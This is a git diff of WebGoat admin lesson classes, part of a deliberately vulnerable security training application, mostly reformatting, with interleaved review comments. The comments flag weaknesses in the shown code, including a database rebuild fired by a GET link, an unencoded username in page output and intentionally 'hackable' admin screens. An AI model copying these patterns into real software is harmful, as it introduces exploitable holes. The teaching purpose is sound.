+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Jeff Williams Aspect Security - * @created October 28, 2003 + * + * @author Jeff Williams Aspect Security + * @created October 28, 2003 */ public abstract class AdminScreen extends Screen { - /** - * Description of the Field - */ - protected String query = null; + /** + * Description of the Field + */ + protected String query = null; + /** + * Constructor for the AdminScreen object + * + * @param s + * Description of the Parameter + * @param q + * Description of the Parameter + */ + public AdminScreen(WebSession s, String q) + { + setQuery(q); - /** - * Constructor for the AdminScreen object - * - * @param s Description of the Parameter - * @param q Description of the Parameter - */ - public AdminScreen(WebSession s, String q) - { - setQuery(q); + // setupAdmin(s); FIXME: what was this supposed to do? + } - // setupAdmin(s); FIXME: what was this supposed to do? 
- } + /** + * Constructor for the AdminScreen object + * + * @param s + * Description of the Parameter + */ + public AdminScreen(WebSession s) + { + } + /** + * Constructor for the AdminScreen object + */ + public AdminScreen() + { + } - /** - * Constructor for the AdminScreen object - * - * @param s Description of the Parameter - */ - public AdminScreen(WebSession s) - {} + /** + * Gets the title attribute of the AdminScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Admin Information"); + } + public String getRole() + { + return AbstractLesson.ADMIN_ROLE; + } - /** - * Constructor for the AdminScreen object - */ - public AdminScreen() - {} - - - /** - * Gets the title attribute of the AdminScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Admin Information"); - } - - - public String getRole() - { - return AbstractLesson.ADMIN_ROLE; - } - - - /** - * Sets the query attribute of the AdminScreen object - * - * @param q The new query value - */ - public void setQuery(String q) - { - query = q; - } + /** + * Sets the query attribute of the AdminScreen object + * + * @param q + * The new query value + */ + public void setQuery(String q) + { + query = q; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ProductsAdminScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ProductsAdminScreen.java index 7a19cab7c..665552856 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ProductsAdminScreen.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ProductsAdminScreen.java @@ -1,10 +1,10 @@ + package org.owasp.webgoat.lessons.admin; import java.sql.Connection; import java.sql.ResultSet; import java.sql.ResultSetMetaData; import java.sql.Statement; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.owasp.webgoat.lessons.Category; 
@@ -12,117 +12,110 @@ import org.owasp.webgoat.lessons.LessonAdapter; import org.owasp.webgoat.session.DatabaseUtilities; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Jeff Williams Aspect Security - * @created October 28, 2003 + * + * @author Jeff Williams Aspect Security + * @created October 28, 2003 */ public class ProductsAdminScreen extends LessonAdapter { - private final static String QUERY = "SELECT * FROM product_system_data"; + private final static String QUERY = "SELECT * FROM product_system_data"; - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - try + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) { - Connection connection = DatabaseUtilities.getConnection(s); + ElementContainer ec = new ElementContainer(); - Statement statement = connection.createStatement( - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet results = statement.executeQuery(QUERY); + try + { + Connection connection = DatabaseUtilities.getConnection(s); - if (results != null) - { - makeSuccess(s); - ResultSetMetaData resultsMetaData = results.getMetaData(); - ec.addElement(DatabaseUtilities.writeTable(results, - resultsMetaData)); - } - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + Statement statement 
= connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + ResultSet results = statement.executeQuery(QUERY); + + if (results != null) + { + makeSuccess(s); + ResultSetMetaData resultsMetaData = results.getMetaData(); + ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData)); + } + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + + return (ec); } - return (ec); - } + /** + * Gets the category attribute of the ProductsAdminScreen object + * + * @return The category value + */ + protected Category getDefaultCategory() + { + return Category.ADMIN_FUNCTIONS; + } + /** + * Gets the role attribute of the ProductsAdminScreen object + * + * @return The role value + */ + public String getRole() + { + return HACKED_ADMIN_ROLE; + } - /** - * Gets the category attribute of the ProductsAdminScreen object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.ADMIN_FUNCTIONS; - } + /** + * Gets the title attribute of the ProductsAdminScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Product Information"); + } + private final static Integer DEFAULT_RANKING = new Integer(1000); - /** - * Gets the role attribute of the ProductsAdminScreen object - * - * @return The role value - */ - public String getRole() - { - return HACKED_ADMIN_ROLE; - } - - - /** - * Gets the title attribute of the ProductsAdminScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Product Information"); - } - - private final static Integer DEFAULT_RANKING = new Integer(1000); - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } } 
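Review bot: The Statement and ResultSet created in createContent are never closed on either the success or the exception path, so each view of this admin screen holds a cursor open on the connection returned by DatabaseUtilities.getConnection(s); whether that connection is per-session or pooled is not visible here, so I only close the statement, which per JDBC also closes its ResultSet. The broad `catch (Exception e)` with `e.printStackTrace()` is kept for consistency with the neighbouring lesson classes but deserves a narrower `SQLException` catch when this file is next touched. The Javadoc placeholders ("Description of the Method", "Description of the Parameter") should be replaced with a real summary, e.g. `/** Renders product_system_data as an HTML table and marks the lesson complete when the query returns a result set. */`.
```java
    protected Element createContent(WebSession s)
    {
        ElementContainer ec = new ElementContainer();
        Statement statement = null;

        try
        {
            Connection connection = DatabaseUtilities.getConnection(s);

            statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
            ResultSet results = statement.executeQuery(QUERY);

            // … unchanged: makeSuccess / writeTable …
        } catch (Exception e)
        {
            // … unchanged: setMessage and printStackTrace …
        } finally
        {
            if (statement != null)
            {
                try
                {
                    statement.close(); // closing the Statement also closes its ResultSet
                } catch (Exception ignored)
                {
                    // nothing useful can be done about a failed close here
                }
            }
        }

        return (ec);
    }
```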
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/RefreshDBScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/RefreshDBScreen.java index c5da5e124..b3e70e003 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/RefreshDBScreen.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/RefreshDBScreen.java @@ -1,8 +1,8 @@ + package org.owasp.webgoat.lessons.admin; import java.sql.Connection; import org.owasp.webgoat.lessons.*; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
@@ -12,155 +12,146 @@ import org.apache.ecs.html.TR; import org.apache.ecs.html.Table; import org.owasp.webgoat.session.*; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Jeff Williams Aspect Security - * @created October 28, 2003 + * + * @author Jeff Williams Aspect Security + * @created October 28, 2003 */ public class RefreshDBScreen extends LessonAdapter { - private final static String REFRESH = "Refresh"; + private final static String REFRESH = "Refresh"; - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - try + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) { - boolean refresh = s.getParser().getBooleanParameter(REFRESH, false); + ElementContainer ec = new ElementContainer(); - if (refresh) - { - refreshDB(s); - ec.addElement(new StringElement( - "Successfully refreshed the database.")); - } - else - { - Element label = new StringElement("Refresh the database? 
"); - A link1 = ECSFactory.makeLink("Yes", REFRESH, true); - A link2 = ECSFactory.makeLink("No", REFRESH, false); - TD td1 = new TD().addElement(label); - TD td2 = new TD().addElement(link1); - TD td3 = new TD().addElement(link2); - TR row = new TR().addElement(td1).addElement(td2).addElement( - td3); - Table t = new Table().setCellSpacing(40).setWidth("50%"); - - if (s.isColor()) + try { - t.setBorder(1); + boolean refresh = s.getParser().getBooleanParameter(REFRESH, false); + + if (refresh) + { + refreshDB(s); + ec.addElement(new StringElement("Successfully refreshed the database.")); + } + else + { + Element label = new StringElement("Refresh the database? "); + A link1 = ECSFactory.makeLink("Yes", REFRESH, true); + A link2 = ECSFactory.makeLink("No", REFRESH, false); + TD td1 = new TD().addElement(label); + TD td2 = new TD().addElement(link1); + TD td3 = new TD().addElement(link2); + TR row = new TR().addElement(td1).addElement(td2).addElement(td3); + Table t = new Table().setCellSpacing(40).setWidth("50%"); + + if (s.isColor()) + { + t.setBorder(1); + } + + t.addElement(row); + ec.addElement(t); + } + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); } - t.addElement(row); - ec.addElement(t); - } + return (ec); } - catch (Exception e) + + /** + * Gets the category attribute of the RefreshDBScreen object + * + * @return The category value + */ + protected Category getDefaultCategory() { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + return Category.ADMIN_FUNCTIONS; } - return (ec); - } + private final static Integer DEFAULT_RANKING = new Integer(1000); - - /** - * Gets the category attribute of the RefreshDBScreen object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.ADMIN_FUNCTIONS; - } - - private final static Integer DEFAULT_RANKING = new Integer(1000); - - - protected Integer getDefaultRanking() 
- { - return DEFAULT_RANKING; - } - - - /** - * Gets the role attribute of the RefreshDBScreen object - * - * @return The role value - */ - public String getRole() - { - return ADMIN_ROLE; - } - - - /** - * Gets the title attribute of the RefreshDBScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Refresh Database"); - } - - - /** - * Description of the Method - * - * @param s Description of the Parameter - */ - public void refreshDB(WebSession s) - { - try + protected Integer getDefaultRanking() { - Connection connection = DatabaseUtilities.getConnection(s); + return DEFAULT_RANKING; + } - CreateDB db = new CreateDB(); - db.makeDB(connection); - System.out.println("Successfully refreshed the database."); - } - catch (Exception e) + /** + * Gets the role attribute of the RefreshDBScreen object + * + * @return The role value + */ + public String getRole() { - s.setMessage("Error refreshing database " - + this.getClass().getName()); - e.printStackTrace(); + return ADMIN_ROLE; + } + + /** + * Gets the title attribute of the RefreshDBScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Refresh Database"); + } + + /** + * Description of the Method + * + * @param s + * Description of the Parameter + */ + public void refreshDB(WebSession s) + { + try + { + Connection connection = DatabaseUtilities.getConnection(s); + + CreateDB db = new CreateDB(); + db.makeDB(connection); + System.out.println("Successfully refreshed the database."); + } catch (Exception e) + { + s.setMessage("Error refreshing database " + this.getClass().getName()); + e.printStackTrace(); + } } - } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ReportCardScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ReportCardScreen.java index 7381fd848..88d83b819 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ReportCardScreen.java 
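Review bot: The database refresh in createContent is triggered by a plain link (`ECSFactory.makeLink("Yes", REFRESH, true)`) and acted on as soon as `getBooleanParameter(REFRESH, false)` is true, which presumably means a GET request rebuilds the whole database; a state-changing admin action like this should be behind a form submission rather than a link so that link prefetchers and cross-site requests cannot fire it, and a short comment such as `// Destructive: rebuilds the entire database; must stay admin-only (see getRole)` above the refresh branch would make the intent explicit. In refreshDB, `System.out.println("Successfully refreshed the database.")` and `e.printStackTrace()` write to stdout/stderr instead of the servlet log; the message should go through `s.setMessage(...)` like the error path does. The "Description of the Method" Javadoc on refreshDB says nothing; a grounded summary is `/** Runs CreateDB.makeDB on the session's connection, reporting failure through s.setMessage. */`.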
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ReportCardScreen.java @@ -1,7 +1,7 @@ + package org.owasp.webgoat.lessons.admin; import java.util.Iterator; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.HtmlColor; 
@@ -20,302 +20,286 @@ import org.owasp.webgoat.session.Screen; import org.owasp.webgoat.session.UserTracker; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Bruce Mayhew WebGoat - * @created October 28, 2003 + * + * @author Bruce Mayhew WebGoat + * @created October 28, 2003 */ public class ReportCardScreen extends LessonAdapter { - /** - * Description of the Field - */ - protected final static String USERNAME = "Username"; + /** + * Description of the Field + */ + protected final static String USERNAME = "Username"; - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - String user = null; - - try + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) { - if (s.getRequest().isUserInRole(WebSession.WEBGOAT_ADMIN)) - { - user = s.getParser().getRawParameter(USERNAME); - } - else - { - user = s.getUserName(); - } - } - catch (Exception e) - {} + ElementContainer ec = new ElementContainer(); - if (user == null) - { - user = s.getUserName(); + String user = null; + + try + { + if (s.getRequest().isUserInRole(WebSession.WEBGOAT_ADMIN)) + { + user = s.getParser().getRawParameter(USERNAME); + } + else + { + user = s.getUserName(); + } + } catch (Exception e) + { + } + + if (user == null) + { + user = s.getUserName(); + } + + ec.addElement(makeFeedback(s)); + 
ec.addElement(makeReportCard(s, user)); + + return ec; } - ec.addElement(makeFeedback(s)); - ec.addElement(makeReportCard(s, user)); - - return ec; - } - - - private Element makeFeedback(WebSession s) - { - ElementContainer ec = new ElementContainer(); - ec.addElement(new Center(new StringElement( - "Comments and suggestions are welcome. " - + getWebgoatContext().getFeedbackAddress()))); - - return ec; - } - - - /** - * Gets the category attribute of the UserAdminScreen object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.ADMIN_FUNCTIONS; - } - - private final static Integer DEFAULT_RANKING = new Integer(1000); - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - /** - * Gets the role attribute of the UserAdminScreen object - * - * @return The role value - */ - public String getRole() - { - return USER_ROLE; - } - - - /** - * Gets the title attribute of the UserAdminScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Report Card"); - } - - - /** - * Description of the Method - * - * @param screen Description of the Parameter - * @param s Description of the Parameter - * @param user Description of the Parameter - * @return Description of the Return Value - */ - private TR makeLessonRow(WebSession s, String user, Screen screen) - { - LessonTracker lessonTracker = UserTracker.instance().getLessonTracker( - s, user, screen); - TR tr = new TR(); - if (lessonTracker.getCompleted()) + private Element makeFeedback(WebSession s) { - tr.setBgColor(HtmlColor.LIGHTGREEN); - } - else if (lessonTracker.getNumVisits() == 0) - { - tr.setBgColor(HtmlColor.LIGHTBLUE); - } - else if (!lessonTracker.getCompleted() - && lessonTracker.getNumVisits() > 10) - { - tr.setBgColor(HtmlColor.RED); - } - else - { - tr.setBgColor(HtmlColor.YELLOW); - } - tr.addElement(new TD().addElement(screen.getTitle())); - tr.addElement(new TD().setAlign("CENTER").addElement( - 
lessonTracker.getCompleted() ? "Y" : "N")); - tr.addElement(new TD().setAlign("CENTER").addElement( - Integer.toString(lessonTracker.getNumVisits()))); - tr.addElement(new TD().setAlign("CENTER").addElement( - Integer.toString(lessonTracker.getMaxHintLevel()))); - tr.addElement(new TD().setAlign("CENTER").addElement( - lessonTracker.getViewedCookies() ? "Y" : "N")); - tr.addElement(new TD().setAlign("CENTER").addElement( - lessonTracker.getViewedHtml() ? "Y" : "N")); - tr.addElement(new TD().setAlign("CENTER").addElement( - lessonTracker.getViewedLessonPlan() ? "Y" : "N")); - tr.addElement(new TD().setAlign("CENTER").addElement( - lessonTracker.getViewedParameters() ? "Y" : "N")); - tr.addElement(new TD().setAlign("CENTER").addElement( - lessonTracker.getViewedSource() ? "Y" : "N")); - return tr; - } + ElementContainer ec = new ElementContainer(); + ec.addElement(new Center(new StringElement("Comments and suggestions are welcome. " + + getWebgoatContext().getFeedbackAddress()))); - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element makeMessages(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - return (ec); - } - - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @param user Description of the Parameter - * @return Description of the Return Value - */ - public Element makeReportCard(WebSession s, String user) - { - ElementContainer ec = new ElementContainer(); - - ec.addElement(makeUser(s, user)); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1); - - if (s.isColor()) - { - t.setBorder(1); - } - TR tr = new TR(); - t.addElement(makeUserHeaderRow()); - - // These are all the user lesson - tr = new TR(); - tr.addElement(new TD().setAlign("CENTER").setColSpan(9).addElement( - "Normal user lessons")); - t.addElement(tr); - for (Iterator lessonIter = s.getCourse().getLessons(s, - 
AbstractLesson.USER_ROLE).iterator(); lessonIter.hasNext();) - { - Screen screen = (Screen) lessonIter.next(); - t.addElement(makeLessonRow(s, user, screen)); + return ec; } - // The user figured out there was a hackable admin acocunt - tr = new TR(); - tr.addElement(new TD().setAlign("CENTER").setColSpan(9).addElement( - "Hackable Admin Screens")); - t.addElement(tr); - for (Iterator lessonIter = s.getCourse().getLessons(s, - AbstractLesson.HACKED_ADMIN_ROLE).iterator(); lessonIter - .hasNext();) + /** + * Gets the category attribute of the UserAdminScreen object + * + * @return The category value + */ + protected Category getDefaultCategory() { - Screen screen = (Screen) lessonIter.next(); - t.addElement(makeLessonRow(s, user, screen)); + return Category.ADMIN_FUNCTIONS; } - // The user figured out how to actually hack the admin acocunt - tr = new TR(); - tr.addElement(new TD().setAlign("CENTER").setColSpan(9).addElement( - "Actual Admin Screens")); - t.addElement(tr); - for (Iterator lessonIter = s.getCourse().getLessons(s, - AbstractLesson.ADMIN_ROLE).iterator(); lessonIter.hasNext();) + private final static Integer DEFAULT_RANKING = new Integer(1000); + + protected Integer getDefaultRanking() { - Screen screen = (Screen) lessonIter.next(); - t.addElement(makeLessonRow(s, user, screen)); + return DEFAULT_RANKING; } - ec.addElement(t); - return (ec); - } + /** + * Gets the role attribute of the UserAdminScreen object + * + * @return The role value + */ + public String getRole() + { + return USER_ROLE; + } + /** + * Gets the title attribute of the UserAdminScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Report Card"); + } - /** - * Description of the Method - * - * @param s Description of the Parameter - * @param user Description of the Parameter - * @return Description of the Return Value - */ - protected Element makeUser(WebSession s, String user) - { - H2 h2 = new H2(); - // FIXME: The session is the current 
session, not the session of the user we are reporting. - //String type = s.isAdmin() ? " [Administrative User]" : s.isHackedAdmin() ? " [Normal User - Hacked Admin Access]" : " [Normal User]"; - String type = ""; - h2.addElement(new StringElement("Results for: " + user + type)); - return h2; - } + /** + * Description of the Method + * + * @param screen + * Description of the Parameter + * @param s + * Description of the Parameter + * @param user + * Description of the Parameter + * @return Description of the Return Value + */ + private TR makeLessonRow(WebSession s, String user, Screen screen) + { + LessonTracker lessonTracker = UserTracker.instance().getLessonTracker(s, user, screen); + TR tr = new TR(); + if (lessonTracker.getCompleted()) + { + tr.setBgColor(HtmlColor.LIGHTGREEN); + } + else if (lessonTracker.getNumVisits() == 0) + { + tr.setBgColor(HtmlColor.LIGHTBLUE); + } + else if (!lessonTracker.getCompleted() && lessonTracker.getNumVisits() > 10) + { + tr.setBgColor(HtmlColor.RED); + } + else + { + tr.setBgColor(HtmlColor.YELLOW); + } + tr.addElement(new TD().addElement(screen.getTitle())); + tr.addElement(new TD().setAlign("CENTER").addElement(lessonTracker.getCompleted() ? "Y" : "N")); + tr.addElement(new TD().setAlign("CENTER").addElement(Integer.toString(lessonTracker.getNumVisits()))); + tr.addElement(new TD().setAlign("CENTER").addElement(Integer.toString(lessonTracker.getMaxHintLevel()))); + tr.addElement(new TD().setAlign("CENTER").addElement(lessonTracker.getViewedCookies() ? "Y" : "N")); + tr.addElement(new TD().setAlign("CENTER").addElement(lessonTracker.getViewedHtml() ? "Y" : "N")); + tr.addElement(new TD().setAlign("CENTER").addElement(lessonTracker.getViewedLessonPlan() ? "Y" : "N")); + tr.addElement(new TD().setAlign("CENTER").addElement(lessonTracker.getViewedParameters() ? "Y" : "N")); + tr.addElement(new TD().setAlign("CENTER").addElement(lessonTracker.getViewedSource() ? 
"Y" : "N")); + return tr; + } + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element makeMessages(WebSession s) + { + ElementContainer ec = new ElementContainer(); - /** - * Description of the Method - * - * @return Description of the Return Value - */ - private TR makeUserHeaderRow() - { - TR tr = new TR(); + return (ec); + } - tr.addElement(new TH("Lesson")); - tr.addElement(new TH("Complete")); - tr.addElement(new TH("Visits")); - tr.addElement(new TH("Hints")); - tr.addElement(new TH("Cookies")); - tr.addElement(new TH("HTML")); - tr.addElement(new TH("LessonPlan")); - tr.addElement(new TH("Parameters")); - tr.addElement(new TH("Source")); + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @param user + * Description of the Parameter + * @return Description of the Return Value + */ + public Element makeReportCard(WebSession s, String user) + { + ElementContainer ec = new ElementContainer(); - return tr; - } + ec.addElement(makeUser(s, user)); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1); + + if (s.isColor()) + { + t.setBorder(1); + } + TR tr = new TR(); + t.addElement(makeUserHeaderRow()); + + // These are all the user lesson + tr = new TR(); + tr.addElement(new TD().setAlign("CENTER").setColSpan(9).addElement("Normal user lessons")); + t.addElement(tr); + for (Iterator lessonIter = s.getCourse().getLessons(s, AbstractLesson.USER_ROLE).iterator(); lessonIter + .hasNext();) + { + Screen screen = (Screen) lessonIter.next(); + t.addElement(makeLessonRow(s, user, screen)); + } + + // The user figured out there was a hackable admin acocunt + tr = new TR(); + tr.addElement(new TD().setAlign("CENTER").setColSpan(9).addElement("Hackable Admin Screens")); + t.addElement(tr); + for (Iterator lessonIter = s.getCourse().getLessons(s, AbstractLesson.HACKED_ADMIN_ROLE).iterator(); lessonIter + .hasNext();) + { 
+ Screen screen = (Screen) lessonIter.next(); + t.addElement(makeLessonRow(s, user, screen)); + } + + // The user figured out how to actually hack the admin acocunt + tr = new TR(); + tr.addElement(new TD().setAlign("CENTER").setColSpan(9).addElement("Actual Admin Screens")); + t.addElement(tr); + for (Iterator lessonIter = s.getCourse().getLessons(s, AbstractLesson.ADMIN_ROLE).iterator(); lessonIter + .hasNext();) + { + Screen screen = (Screen) lessonIter.next(); + t.addElement(makeLessonRow(s, user, screen)); + } + + ec.addElement(t); + return (ec); + } + + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @param user + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element makeUser(WebSession s, String user) + { + H2 h2 = new H2(); + // FIXME: The session is the current session, not the session of the user we are reporting. + // String type = s.isAdmin() ? " [Administrative User]" : s.isHackedAdmin() ? " [Normal User + // - Hacked Admin + // Access]" : " [Normal User]"; + String type = ""; + h2.addElement(new StringElement("Results for: " + user + type)); + return h2; + } + + /** + * Description of the Method + * + * @return Description of the Return Value + */ + private TR makeUserHeaderRow() + { + TR tr = new TR(); + + tr.addElement(new TH("Lesson")); + tr.addElement(new TH("Complete")); + tr.addElement(new TH("Visits")); + tr.addElement(new TH("Hints")); + tr.addElement(new TH("Cookies")); + tr.addElement(new TH("HTML")); + tr.addElement(new TH("LessonPlan")); + tr.addElement(new TH("Parameters")); + tr.addElement(new TH("Source")); + + return tr; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/SummaryReportCardScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/SummaryReportCardScreen.java index 1747a5ff0..075a1d597 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/SummaryReportCardScreen.java 
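Review bot: The `catch (Exception e) { }` in ReportCardScreen.createContent swallows every failure of the role check and the USERNAME lookup, so a parser or request error is indistinguishable from "no USERNAME supplied" and is only masked by the later fallback to `s.getUserName()`; if that fallback is the intent, make it explicit: `catch (Exception ignored) { // no usable USERNAME: fall back to the session user below }`. In makeReportCard the `TR tr = new TR();` before `t.addElement(makeUserHeaderRow());` is dead, since `tr = new TR();` overwrites it on the next statement; declaring `TR tr;` at the first real use removes the wasted allocation. In makeLessonRow the `!lessonTracker.getCompleted() &&` in the third branch is always true there, because the first branch already handled the completed case. The admin-supplied USERNAME parameter also reaches the `"Results for: " + user + type` heading in makeUser unchanged; whether StringElement HTML-encodes it is not visible in this hunk, so confirm before relying on it.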
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/SummaryReportCardScreen.java @@ -1,8 +1,8 @@ + package org.owasp.webgoat.lessons.admin; import java.util.Enumeration; import java.util.Iterator; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.HtmlColor; 
